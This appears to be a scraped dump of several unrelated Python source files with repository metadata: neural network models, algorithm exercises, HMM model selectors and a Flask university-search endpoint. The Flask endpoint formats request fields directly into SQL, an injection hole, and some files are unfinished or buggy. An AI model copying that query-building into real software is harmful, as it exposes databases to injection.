m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def stochastic_downsampling(self, blockID, ratio):
block_chosen = blockID is None and random.randint(-1, self.blockID) or blockID
downsampling_ratios = ratio is None and [0.5, 0.75] or [ratio, ratio]
if self.blockID == block_chosen:
self.downsampling_ratio = downsampling_ratios[random.randint(0,1)]
else:
self.downsampling_ratio = 1.
for m in self.modules():
if isinstance(m, Bottleneck):
if m.blockID == block_chosen:
m.downsampling_ratio = downsampling_ratios[random.randint(0,1)]
else:
m.downsampling_ratio = 1.
def forward(self, x, blockID=None, ratio=None):
self.stochastic_downsampling(blockID, ratio)
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
if self.downsampling_ratio < 1:
if self.size_after_maxpool is None:
self.size_after_maxpool = self.maxpool(x).size(2)
x = F.adaptive_max_pool2d(x, int(round(self.size_after_maxpool*self.downsampling_ratio)))
else:
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.bn2(x)
x = self.relu(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
def preresnet18(pretrained=False, **kwargs):
"""Constructs a PreResNet-18 model.
"""
model = PreResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
return model
def preresnet34(pretrained=False, **kwargs):
"""Constructs a PreResNet-34 model.
"""
model = PreResNet(BasicBlock, [3, 4, 6, 3], **kwargs)
return model
def preresnet50(pretrained=False, **kwargs):
"""Constructs a PreResNet-50 model.
"""
model = PreResNet(Bottleneck, [3, 4, 6, 3], **kwargs)
return model
def preresnet101(pretrained=False, **kwargs):
"""Constructs a PreResNet-101 model.
"""
model = PreResNet(Bottleneck, [3, 4, 23, 3], **kwargs)
return model
def preresnet152(pretrained=False, **kwargs):
"""Constructs a PreResNet-152 model.
"""
model = PreResNet(Bottleneck, [3, 8, 36, 3], **kwargs)
return model
def preresnet200(pretrained=False, **kwargs):
"""Constructs a PreResNet-200 model.
"""
model = PreResNet(Bottleneck, [3, 24, 36, 3], **kwargs)
return model | [
"jason7fd@gmail.com"
] | jason7fd@gmail.com |
c653ef0b248892879977259685362bf27d177e0a | 6e62c6e531b307c7797cf8320920353f2ee5cd0c | /104-Maximum-Depth-of-Binary-Tree.py | 94e4f42d0df6f7f5c2a6148eca22beb054950c7b | [] | no_license | OhMesch/Algorithm-Problems | 1d7dbce7f3dda40ff1ec3e7851fb9ceb9b94d791 | 61933e7c0b8d8ffef9bd9a4af4fddfdb77568b62 | refs/heads/master | 2022-10-02T23:51:08.303274 | 2022-08-22T22:12:00 | 2022-08-22T22:12:00 | 93,125,900 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,406 | py | # Problem: Given a binary tree
# Return: Each level of the tree
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def maxDepth(self, root):
"""
:type root: TreeNode
:rtype: int
"""
sol = [0]
if root == None:
return(0)
self.helper(root,1,sol)
return(sol[-1])
def helper(self,root,depth,depthArr):
"""
:type root: TreeNode
:type depth: int
:rtype: int
"""
if depth > depthArr[-1]:
depthArr.append(depth)
if root.left:
self.helper(root.left,depth+1,depthArr)
if root.right:
self.helper(root.right,depth+1,depthArr)
# -----------------------------------------------------------------------
driver = Solution()
t1 = TreeNode(1)
t1.right = TreeNode(2)
t1.left = TreeNode(3)
t1.left.left = TreeNode(5)
t2 = TreeNode(2)
t2.left = TreeNode(1)
t2.right = TreeNode(3)
t2.left.right = TreeNode(4)
t2.right.left = TreeNode(7)
t3 = TreeNode(1)
t3.left = TreeNode(2)
t3.right = TreeNode(3)
t3.left.left = TreeNode(4)
t3.left.right = TreeNode(5)
t3.right.left = TreeNode(6)
t3.right.right = TreeNode(7)
print(driver.maxDepth(t1))
print(driver.maxDepth(t2))
print(driver.maxDepth(t3)) | [
"mze5111@gmail.com"
] | mze5111@gmail.com |
585d7ba4e786f38d383aff0c3988d0d78c3af34d | 01759486a230eeb74022fc83495bb14876f72a7a | /create_label_map.py | 7ea3e27f58a4b9871fe57a569b2014ba86577ee2 | [
"Apache-2.0"
] | permissive | jwlw2022/2019_intern_project | eeac05a1e1271c1da8cfdac10075a723ff347f80 | 8c146815d4288882f41ac3ad85ba7f5da252abec | refs/heads/master | 2021-06-13T14:49:34.014300 | 2021-05-20T13:04:11 | 2021-05-20T13:04:11 | 189,961,810 | 1 | 0 | Apache-2.0 | 2019-06-13T01:53:30 | 2019-06-03T08:05:28 | Python | UTF-8 | Python | false | false | 1,133 | py | # Copyright 2019 VIA Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import sys
import scipy.io as sio
if (len(sys.argv) < 2):
print('Missing argument: path to cars_annos.mat file')
sys.exit(1)
annotation_file = sys.argv[1]
mat = sio.loadmat(annotation_file)
with open('stanford_cars_label_map.pbtxt','w') as output:
for i, vehicle_class in enumerate(mat['class_names'][0]):
print(i+1, str(vehicle_class[0]))
output.write('item {{\n id: {}\n name: \'{}\'\n}}\n\n'.format(i+1, vehicle_class[0]))
| [
"noreply@github.com"
] | noreply@github.com |
ce29bf58af3e5eb3a1d8b346179897b9a2365c95 | 6370e1cea61ab3de3c5451d45e10820b2b382dfe | /settings.py | bc8d2aaeb5ba237c2c831a9ec71f5d383a6f5dc9 | [] | no_license | Maxibond/selenium_work | fd493dc318924cf2978ed18d59613f1e1b15c811 | ae766b227add7033be83fd84ccca2a07b6c5ae2c | refs/heads/master | 2020-01-23T21:09:56.495237 | 2016-12-18T19:03:34 | 2016-12-18T19:03:34 | 74,573,748 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | LOGIN = 'ValidLogin'
PASSWORD = 'ValidPassword'
MAIN_URL = 'http://www.reddit.com/'
| [
"jeymontor@yandex.ru"
] | jeymontor@yandex.ru |
b784cb302379736956e6936d0636e72dbf650465 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02399/s627926226.py | 2a4ef109e41aa4a7c46ff6352b1a640bb190278c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py |
1
2
3
4
5
6
a, b = [int(i) for i in input().split()]
d = a // b
r = a % b
f = a / b
print('{0} {1} {2:.5f}'.format(d, r, f)) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
5edcc07e987188f0acb6a688fe71c980a95958cb | 3da8e3ca17c2da404aa7c148f4e47686a2bd450b | /app.py | 69cdf11a2d3dd7a1dd974b01082ae8784abb3ea6 | [] | no_license | cjbaccus/UdaciDockerProj | d1b4c4664e44370995f42f8db7fcf89f6942a03d | 62e3e5d05522ec031739f8406e7d98c2571badf0 | refs/heads/main | 2023-07-12T05:56:34.245193 | 2021-08-17T18:53:25 | 2021-08-17T18:53:25 | 397,211,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | ips = ["{}.{}.{}.{}".format(i,i,i,i) for i in range(1,10)]
for n in ips:
print("THis is the IP address:{}".format(n))
| [
"cjbaccus@gmail.com"
] | cjbaccus@gmail.com |
d804293a9bb22f13def744ccad3cf0bcce62647f | 0fa7b9328e04d2ff5a2b607d9ec6962b7ee97532 | /vi_lib/lib/torchutils/test/test_models.py | afef409c72474e1be1ac61ba78474b7a8a8e86e3 | [] | no_license | aaronpmishkin/normalizing_flows | 4b12bcbe85f400bb27d21e93d8a3c35d9e5df90c | 249f0d99fee6d07783a2a3a595cfeb439af8c599 | refs/heads/master | 2020-04-09T01:09:40.906963 | 2018-12-14T07:47:08 | 2018-12-14T07:47:08 | 159,893,931 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,472 | py | import unittest
import torch
import torchutils.models as models
from torchutils.params import bp2v
from torch.nn.utils import vector_to_parameters as v2p
from torch.nn.utils import parameters_to_vector as p2v
class MLPTestCase(unittest.TestCase):
def assertAllClose(self, a, b):
self.assertTrue(torch.allclose(a, b, 0.01))
def get_dummy_inputs(self, n, indim, hiddim, outdim, s):
torch.manual_seed(0)
mlp = models.MLP(indim, hiddim, outdim)
x = torch.rand(n, indim)
noise = torch.randn(s, models.num_params(mlp))
return mlp, x, noise
def test_num_params(self):
self.assertEqual(models.num_params(models.MLP(10,[],1)), (10+1))
self.assertEqual(models.num_params(models.MLP(10,[1],1)), (10+1) + (1+1))
self.assertEqual(models.num_params(models.MLP(10,[2],1)), (10+1)*2 + (2+1))
def test_interface_forward(self):
mlp, x, _, = self.get_dummy_inputs(7, 5, [], 1, 3)
y = mlp(x)
self.assertTrue(y.shape[0] == x.shape[0])
self.assertTrue(y.shape[1] == 1)
def test_interface_forward_with_noise(self):
n, s = 7, 3
mlp, x, noise = self.get_dummy_inputs(n, 5, [], 1, s)
print(list(mlp.parameters()))
y = mlp(x, noise)
self.assertTrue(list(y.shape) == [s, n, 1])
mlp, x, noise = self.get_dummy_inputs(n, 5, [11], 1, s)
y = mlp(x, noise)
self.assertTrue(list(y.shape) == [s, n, 1])
def test_backward_with_noise(self):
n, s = 7, 3
def manual_gradient(mlp, x, noise):
mu = p2v(mlp.parameters())
gs = []
for sid in range(s):
v2p((noise[sid,:] + mu).contiguous(), mlp.parameters())
g = torch.autograd.grad(torch.sum(mlp(x)), mlp.parameters())
print([gg.shape for gg in g])
gs.append(bp2v(g, 0))
v2p(mu, mlp.parameters())
return sum(gs)
mlp, x, noise = self.get_dummy_inputs(n, 5, [], 1, s)
grad1 = p2v(torch.autograd.grad(torch.sum(mlp(x, noise)), mlp.parameters()))
grad2 = manual_gradient(mlp, x, noise)
self.assertAllClose(grad1, grad2)
mlp, x, noise = self.get_dummy_inputs(n, 5, [11], 1, s)
grad1 = p2v(torch.autograd.grad(torch.sum(mlp(x, noise)), mlp.parameters()))
grad2 = manual_gradient(mlp, x, noise)
self.assertAllClose(grad1, grad2)
| [
"aaronpmishkin@gmail.com"
] | aaronpmishkin@gmail.com |
05a8191a0221fcf44c3631cb1ae3b634e90a6c50 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/fractions_20200802103056.py | a8e741def594e4049345cfbf9c195c01f24b8d0d | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | def fractions(numerator,denominator):
if denominator == 0 :
return str(numerator)
number = numerator / denominator
if numerator % denominator == 0:
return str(numerator // denominator)
newStr = str(number)
print(newStr)
largeStr = newStr.split(".")
if len(largeStr[1]) > 1:
return largeStr[0] + "." + '(' + largeStr[1][0] + ')'
return newStr
def frac(numerator,denominator):
res = ""
# create a map to store already seen remainders
# remainder is used as key and its position in result is stored as value
# position for cases like 1/6
mp = {}
# find the first remainder
rem = numerator / denominator
print(rem)
# keep finding the remainder until the
print(frac(-4,333)) | [
"mary.jereh@gmail.com"
] | mary.jereh@gmail.com |
d8d24f01e219adb70d6b6d395b2bf63ff36bd787 | 6668026dd24df7a0232902533877603c52db0f80 | /basic_bot/bot.py | 3f5104cc546c43f17e7a82e3f1df5663c030f782 | [] | no_license | awadahmed97/Basic_bot | 9e0dba170bc323a58e67b3d12a95db1d7c435212 | 5cf6a3549e5c348b9b4db97a54aea12719f1144b | refs/heads/master | 2020-12-13T15:18:52.429861 | 2020-02-03T18:34:40 | 2020-02-03T18:34:40 | 234,455,674 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,716 | py | from config import keys
from selenium import webdriver
def order(k):
driver = webdriver.Chrome('./chromedriver')
#enters the site url (key in config file must be filled)
driver.get(k['site_url'])
#For click methods inspect element in chrome
#and copy xpath of the tags you want to click
#(Right click on link or button, then inspect element to see html code
#and go to the tag you want to copy and go to copy xpath)
#EXAMPLES
#driver.find_element_by_xpath('//*[@id="submit"]').click()
#driver.find_element_by_xpath('/html/body/div[1]/div/div/ul/li[1]/a"]').click()
#driver.find_element_by_xpath('').click()
#driver.find_element_by_xpath('').click()
#send keys method will need two inputs
#the first is the the xpath the same for the click method
#the second is the config files keys that you want to use
#remember ('') for xpath and ("") for keys in your config file
#remember config file must be filled out for keys to be entered
#EXAMPLES
#driver.find_element_by_xpath('//*[@id="emailusername"]').send_keys(k["username"])
#driver.find_element_by_xpath('//*[@id="emailpassword"]').send_keys(k["pass"])
#driver.find_element_by_xpath('').send_keys(k[""])
#driver.find_element_by_xpath('').send_keys(k[""])
#when done filling them out put them in correct order depending on what
#you want to click first or what keys to enter and when
#EXAMPLE
driver.find_element_by_xpath('').send_keys(k[""])
driver.find_element_by_xpath('').send_keys(k[""])
driver.find_element_by_xpath('').click()
driver.find_element_by_xpath('').click()
driver.find_element_by_xpath('').send_keys(k[""])
#increase time if you need more time
time.sleep(500)
if __name__ == '__main__':
order(keys)
| [
"noreply@github.com"
] | noreply@github.com |
df115539ee2bd3c37694d308801d6d8006d23e25 | 6c0861b1b7b4f024c864c3948085e7b16457503d | /Quiz/project3.py | e283758689c7b0fb6c2f8e0a56a27b5e29afeff0 | [] | no_license | NasirOrosco/Python | d228cbfe1f6e8f70402ff0e0f54f03fbc30783ec | 7d2288b6e7e34c05a5d56603706dad782dba8789 | refs/heads/main | 2023-07-10T05:29:06.654206 | 2021-08-04T03:48:30 | 2021-08-04T03:48:30 | 332,862,861 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,024 | py | '''
Created on Jul 1, 2021
The purpose is too create a quiz that tests people's basic highschool knowledge.
@author: Nasir
'''
#Make a variable called score to keep track of the correct answers. And set
#it to 0.
score=0
#Ask the user question one. And store the users answer.
question1=input("What is the powerhouse of the cell? a) mitochondria b) nucleus c) ribosome")
#Check if the answer is correct, if it is add one to score and print out
#"Correct"
#Else, print out "Incorrect, the correct answer is A."
if(question1.lower()=="a"):
score=+1
print("Correct")
else:
print("Incorrect, correct answer is a.")
#Ask the user question two. And store the users answer.
#Check if the answer is correct, if it is add one to score and print out
#"Correct"
#Else, print out "Incorrect, the correct answer is C."
question2=input("2) How many states comprise the United States? a) 13 b) 45 c) 50")
if(question2.lower()=="c"):
score=score+1
print("Correct")
else:
print("Incorrect, answer is c.")
#Ask the user question three. And store the users answer.
#Check if the answer is correct, if it is add one to score and print out
#"Correct"
#Else, print out "Incorrect, the correct answer is A."
question3= input("3) In y = mx + b, what does m stand for? a) slope b) output c) I don't understand math")
if(question3.lower()=="a"):
score= score+1
print("Correct")
else:
print("Incorrect, answer is a.")
#Ask the user question four. And store the users answer.
#Check if the answer is correct, if it is add one to score and print out
#"Correct"
#Else, print out "Incorrect, the correct answer is C."
question4=input("4) In English, a person, place or thing is called? A) verb B) adjective C) noun")
if(question4.lower()=="c"):
score=score+1
print("Correct")
else:
print("Incorrect, answer is c.")
#Calculate the percentage the user got. And store it in a variable called p
p= (int(score)/4)*100
#Print out the users score: "You got a [score]/4. Or a [p]%."
print(f"Yout got a {p}%") | [
"nasirorosco18@gmail.com"
] | nasirorosco18@gmail.com |
00dccca5378c4cc542d8e54c54e252e22ed0e38f | 5d4841bd3160418d3deb88b241edc22c7b7eab18 | /server/serving/package_scanner.py | 10cab85c3a049a56099c34414e74816f80bf0b21 | [] | no_license | cxbn12/ntu-nlp | 2493523bb886facfd661dd4194082ccd653496ae | de98f636919267a3701383636ccb31ccf108f28b | refs/heads/master | 2022-03-16T08:32:24.302783 | 2019-11-04T15:31:56 | 2019-11-04T15:31:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,314 | py | import os.path as osp
import sys
from pathlib import Path
def scan_package(path, base_dir='.'):
"""
Scan for all the python packages under a certain path. Note that this
will automatically append the scan path to the PYTHONPATH. You should be
careful if there is some packages with the same name. In the case of a
name collision, latter scanned packages will not be imported.
Args:
path (str): The path which all the packages under it will be
imported. You should provide the package path rather than the
package name.
base_dir (str, optional): The base directory to be used as a import root.
Assume the project structure is like:
.
├── package1
│ └── foo.py
└── setup.py
Without setting base_dir, which will automatically take your
scan root as the import root.
>>> scan_package('package1')
Which is equivalent to
>>> import foo
If you specify the scan root,
>>> scan_package('package1', 'package1')
this function will use the given root:
>>> import package1.foo
However, you should never let a scan root to be empty if the package
to be scanned is a regular package (with __init__.py inside).
.
├── package2
│ ├── __init__.py
│ └── foo.py
└── setup.py
This will raise a ValueError:
>>> scan_package('package2', 'package2')
Which is equivalent to
>>> import .
Raise:
ValueError:
- path does not exist
- base_dir does not exist
- base_dir is not valid for importing
"""
abs_path = osp.abspath(path)
if not osp.exists(abs_path):
raise ValueError('Parameter `path`: {} not exist'.format(abs_path))
if not osp.exists(base_dir):
raise ValueError('Parameter `base_dir`: {} does not exist'.format(base_dir))
base_dir = osp.abspath(base_dir)
if not abs_path.startswith(base_dir):
raise ValueError('`path`: {} is not a subdirectory of `base_dir`: {}'
.format(abs_path, base_dir))
# mark the base directory as source root
sys.path.insert(0, base_dir)
# scan for all **/*.py file under certain dir
modules = [f for f in Path(abs_path).rglob('*.py') if f.is_file()]
# set **/__init__.py to the package name
modules = [f.parent if f.name == '__init__.py' else f for f in modules]
# import all modules
for module in modules:
module_rel_path = module.relative_to(base_dir)
# check for invalid regular package import
if str(module_rel_path) == '.':
raise ValueError('You may want to import package {} with the scan root as the package, '
', which will cause a importing error. Please try some scan roots outside'
'the package')
else:
module_name = '.'.join(module_rel_path.with_suffix('').parts)
# check if the package has been imported
if module_name not in sys.modules.keys():
__import__(module_name)
| [
"YLI056@e.ntu.edu.sg"
] | YLI056@e.ntu.edu.sg |
0183493e05a780be89391b1fbb9d5cc5d38b1490 | 92b544bcfef1c84af63c26352f9b7320a3646c70 | /newfile.py | f0e5554c5d285d4eaf79f414bfa323d887514a25 | [] | no_license | IKRunner/newGitTest | 431c88514807107cf4d92e77896d26ed5dea8b02 | 466caf8582eacf70b1e9022a93b9bda001f2ef15 | refs/heads/main | 2023-03-20T09:18:39.833100 | 2021-03-19T06:34:52 | 2021-03-19T06:34:52 | 349,304,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42 | py | # fsfsfsd
# New iten in adlkfjadl ppppppp | [
"iachilihu@gmail.com"
] | iachilihu@gmail.com |
fae007629c51a3cee178d03c6c3f04a26b153838 | 239bdd0c6aa252de5f3edd1a7a4fd54eaa29f89d | /PPL-assignment/Class -2/mains.py | 932aad591f5616fcaca6bb2fbea24c8756bf2476 | [] | no_license | aawesh2000/PPL-Assignment- | a19d23907273b5d90ffca3f6fd373f6079a6431f | 918daa3e99a353fa8967e5df5029fc5ade225268 | refs/heads/master | 2022-12-28T13:43:31.808653 | 2020-10-01T07:56:20 | 2020-10-01T07:56:20 | 300,231,752 | 0 | 1 | null | 2020-10-09T06:56:58 | 2020-10-01T10:02:19 | null | UTF-8 | Python | false | false | 215 | py | from animal import *
from shapes import * # modularity
t = Tiger()
t.set_limbs(4)
t.show()
m = Man()
m.set_limbs(2, 2)
m.show()
c = Circle()
c.details(True, True)
c.show()
r = Square()
r.details(True)
r.show()
| [
"noreply@github.com"
] | noreply@github.com |
a37f808f292fbec37ef54a374b4b99844add9867 | 498a179cce7ba11c493dac2e1eb519ee10a42698 | /Recognizer/my_model_selectors.py | 7c28fa01b03faff96b7f9afcb21ad46eb98f2f5a | [
"Apache-2.0"
] | permissive | thealokkr/AI-Algorithms | b177f94309daf0f4bbab18fb8931d4d2976a5bf3 | 1632f4b324f5f791adae0d92239770a870d1a49a | refs/heads/master | 2021-07-09T09:38:42.677401 | 2019-03-13T06:01:02 | 2019-03-13T06:01:02 | 148,180,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,763 | py | import math
import statistics
import warnings
import numpy as np
from hmmlearn.hmm import GaussianHMM
from sklearn.model_selection import KFold
from asl_utils import combine_sequences
class ModelSelector(object):
'''
base class for model selection (strategy design pattern)
'''
def __init__(self, all_word_sequences: dict, all_word_Xlengths: dict, this_word: str,
n_constant=3,
min_n_components=2, max_n_components=10,
random_state=14, verbose=False):
self.words = all_word_sequences
self.hwords = all_word_Xlengths
self.sequences = all_word_sequences[this_word]
self.X, self.lengths = all_word_Xlengths[this_word]
self.this_word = this_word
self.n_constant = n_constant
self.min_n_components = min_n_components
self.max_n_components = max_n_components
self.random_state = random_state
self.verbose = verbose
def select(self):
raise NotImplementedError
def base_model(self, num_states):
# with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=DeprecationWarning)
# warnings.filterwarnings("ignore", category=RuntimeWarning)
try:
hmm_model = GaussianHMM(n_components=num_states, covariance_type="diag", n_iter=1000,
random_state=self.random_state, verbose=False).fit(self.X, self.lengths)
if self.verbose:
print("model created for {} with {} states".format(self.this_word, num_states))
return hmm_model
except:
if self.verbose:
print("failure on {} with {} states".format(self.this_word, num_states))
return None
class SelectorConstant(ModelSelector):
""" select the model with value self.n_constant
"""
def select(self):
""" select based on n_constant value
:return: GaussianHMM object
"""
best_num_components = self.n_constant
return self.base_model(best_num_components)
class SelectorBIC(ModelSelector):
""" select the model with the lowest Baysian Information Criterion(BIC) score
http://www2.imm.dtu.dk/courses/02433/doc/ch6_slides.pdf
Bayesian information criteria: BIC = -2 * logL + p * logN
"""
def bic_score(self, n):
"""
Return the bic score
"""
model = self.base_model(n)
logL = model.score(self.X, self.lengths)
logN = np.log(len(self.X))
# p = = n^2 + 2*d*n - 1
d = model.n_features
p = n ** 2 + 2 * d * n - 1
return -2.0 * logL + p * logN, model
def select(self):
""" select the best model for self.this_word based on
BIC score for n between self.min_n_components and self.max_n_components
:return: GaussianHMM object
"""
warnings.filterwarnings("ignore", category=DeprecationWarning)
try:
best_score = float("Inf")
best_model = None
for n in range(self.min_n_components, self.max_n_components + 1):
score, model = self.bic_score(n)
if score < best_score:
best_score, best_model = score, model
return best_model
except:
return self.base_model(self.n_constant)
class SelectorDIC(ModelSelector):
''' select best model based on Discriminative Information Criterion
Biem, Alain. "A model selection criterion for classification: Application to hmm topology optimization."
Document Analysis and Recognition, 2003. Proceedings. Seventh International Conference on. IEEE, 2003.
http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.58.6208&rep=rep1&type=pdf
DIC = log(P(X(i)) - 1/(M-1)SUM(log(P(X(all but i))
'''
def dic_score(self, n):
"""
Return the dic score based on likehood
"""
model = self.base_model(n)
scores = []
for word, (X, lengths) in self.hwords.items():
if word != self.this_word:
scores.append(model.score(X, lengths))
return model.score(self.X, self.lengths) - np.mean(scores), model
def select(self):
warnings.filterwarnings("ignore", category=DeprecationWarning)
try:
best_score = float("-Inf")
best_model = None
for n in range(self.min_n_components, self.max_n_components + 1):
score, model = self.dic_score(n)
if score > best_score:
best_score = score
best_model = model
return best_model
except:
return self.base_model(self.n_constant)
class SelectorCV(ModelSelector):
''' select best model based on average log Likelihood of cross-validation folds
'''
def select(self):
warnings.filterwarnings("ignore", category=DeprecationWarning)
best_score, best_n_components = None, None
for n_components in range(self.min_n_components, self.max_n_components + 1):
scores, n_splits = [], 3
if (len(self.sequences) < 3):
try:
model = GaussianHMM(n_components=n_components, n_iter=1000).fit(self.X, self.lengths)
logL = model.score(self.X, self.lengths)
if (best_score is None or logL > best_score):
best_score, best_n_components = logL, n_components
except Exception as e:
# Skip cross-validation for current n_components
continue
else:
split_method = KFold(random_state=self.random_state, n_splits=n_splits)
for cv_train_idx, cv_test_idx in split_method.split(self.sequences):
X_train, lengths_train = combine_sequences(cv_train_idx, self.sequences)
X_test, lengths_test = combine_sequences(cv_test_idx, self.sequences)
try:
model = GaussianHMM(n_components=n_components, n_iter=1000).fit(X_train, lengths_train)
logL = model.score(X_test, lengths_test)
scores.append(logL)
except Exception as e:
break
training_successful = len(scores) == n_splits
if (not training_successful): continue
avg = np.average(scores)
if (best_score is None or avg > best_score):
best_score, best_n_components = avg, n_components
if (best_score == None):
best_n_components = 3
return self.base_model(best_n_components)
| [
"noreply@github.com"
] | noreply@github.com |
e739c6d1ddb77e7148a871dcd36bce0dfe716734 | b44cc62938ffd5e032097f2eefb2ff16bb3d630f | /app/views/search.py | b0e98cbd73c2da9f3bdf3fbe2be38f473dcd5633 | [] | no_license | rajeshagashe/universitySearch | 3761c170e0b0615af4e29bc8e85294732c98abac | 4bf2f60899a5c95f09ae4d4c429bbb40b3099b44 | refs/heads/master | 2022-12-02T03:55:47.629533 | 2020-08-10T19:56:47 | 2020-08-10T19:56:47 | 286,098,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,153 | py | from flask import (
Blueprint, request
)
from app.models.universities import UniversityInfo
from app.extensions import postgres_db
import traceback
import json
from flask_sqlalchemy import SQLAlchemy
search_blueprint = Blueprint('search', __name__)
@search_blueprint.route('/universities', methods=["POST"])
def view():
try:
return_list = []
request_json = request.get_json()
query = """ Select
* from university_info
Where
name like \'%{}%\'
""".format(request_json.get('name', ''),)
if request_json.get('country_codes', False):
alpha_two_codes = '('
for each in request_json.get('country_codes'):
alpha_two_codes += '\'' + str(each) + '\'' ','
if alpha_two_codes[-1] == ',':
alpha_two_codes = alpha_two_codes[:-1]
alpha_two_codes += ')'
query += """AND
alpha_two_code in {}""".format(alpha_two_codes)
if request_json.get('domains', False):
domains = '\'('
for each in request_json.get('domains'):
domains += str(each) + '|'
if domains[-1] == '|':
domains = domains[:-1]
domains += ')\''
query += """AND
domain ~ {}""".format(domains)
offset = int(request_json.get('offset', '0'))
limit = int(request_json.get('limit', '10'))
query += ''' limit {} offset {}'''.format(limit, offset)
result = postgres_db.session.execute(query)
for each in result:
aux_dict = {}
aux_dict['id'] = each[0]
aux_dict['alpha_two_code'] = each[1]
aux_dict['country'] = each[2]
aux_dict['domain'] = each[3]
aux_dict['name'] = each[4]
aux_dict['web_page'] = each[5]
return_list.append(aux_dict)
return json.dumps(return_list)
except:
traceback.print_exc()
return 'Something went wrong.' | [
"rajeshagashe94@gmail.com"
] | rajeshagashe94@gmail.com |
392f89400bb41debeaf5b43d922ac73a8730406f | 68a3913a23da6187e41c0aae4f9b06075e9c248e | /project files/pytorch-neural-network.py | c1e0cef6cc06e596b4cc8e00e47542712ed5c410 | [] | no_license | AustinCai/RedditComment_MulticlassClassification | ca6df3fdeba6fb6f0b43ffbdd9c52dc0926bec21 | a4f2be7bcc43770d81a7f4db0f2340fc7101776e | refs/heads/master | 2020-06-01T20:51:36.739149 | 2019-09-21T14:57:30 | 2019-09-21T14:57:30 | 190,922,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,127 | py | # CS 221 Neural Netork Implementation
'''
Erick Fidel Siavichay-Velasco |
This file contains a neural network implementation using PyTorch v1.1.0
'''
# Packages needed
import sys
import pickle
import torch
from torch.autograd import Variable
import torch.nn as nn
import numpy as np
class Neural_Network(nn.Module):
def __init__(self, ):
super(Neural_Network, self).__init__()
# Parameters
# Current state:
# 3 layer model; input layer with 300 neurons (number of features)
# 1 hidden layer, with 3 neurons
# 1 output layer, with 1 neuron
self.inputSize = 300
self.hiddenSize = 3
self.outputSize = 1
# Learning rate
# bigger means faster convergence but less accuracy
# smaller means slower convergence but more accuracy
self.alpha = 0.1
# Thetas, randomly initialize
self.W1 = torch.randn(self.hiddenSize, self.inputSize) # Should be (3x300)
self.W2 = torch.randn(self.outputSize, self.hiddenSize) # Should be (1x3)
# Performs forward propagation with input X
def forward(self, X):
self.z1 = torch.matmul(self.W1, X)
self.a1 = self.sigmoid(self.z1) #Should be (3xNUM_FEATURES)
self.z2 = torch.matmul(self.W2, self.a1)
a2 =self.sigmoid(self.z2) # y hat, actual hypthesis
return a2
# a2 should be the prediction vector, and it should just be a scalar...not a vector
# This is returning 1x3 for some reason. unclear what is happening to the matrix multiplication in forward()
# if a2.item().item() <= 0.5:
# return 0
# else:
# return 1
# activation functions, can change later
def sigmoid(self, s):
return 1 / (1 + torch.exp(-s))
def sigmoidPrime(self, s):
return s * (1 - s)
# Performs back prop
def backward(self, X, y, a2):
#Debug statements: why aren't a2 and y same dimension???
print("y size: ", y.size())
print("a2 size: ", a2.size())
self.a2_error = y - a2 # error in output
self.a2_delta = self.a2_error * self.sigmoidPrime(a2) # derivative of sig to error
self.a1_error = torch.matmul(torch.t(self.W2),self.a2_delta)
self.a1_delta = self.a1_error * self.sigmoidPrime(self.a1)
self.W1 += torch.matmul(self.a1_delta, torch.t(X))*(self.alpha)
self.W2 += torch.matmul(self.a2_delta, torch.t(self.a1))*(self.alpha)
def train(self, X, y):
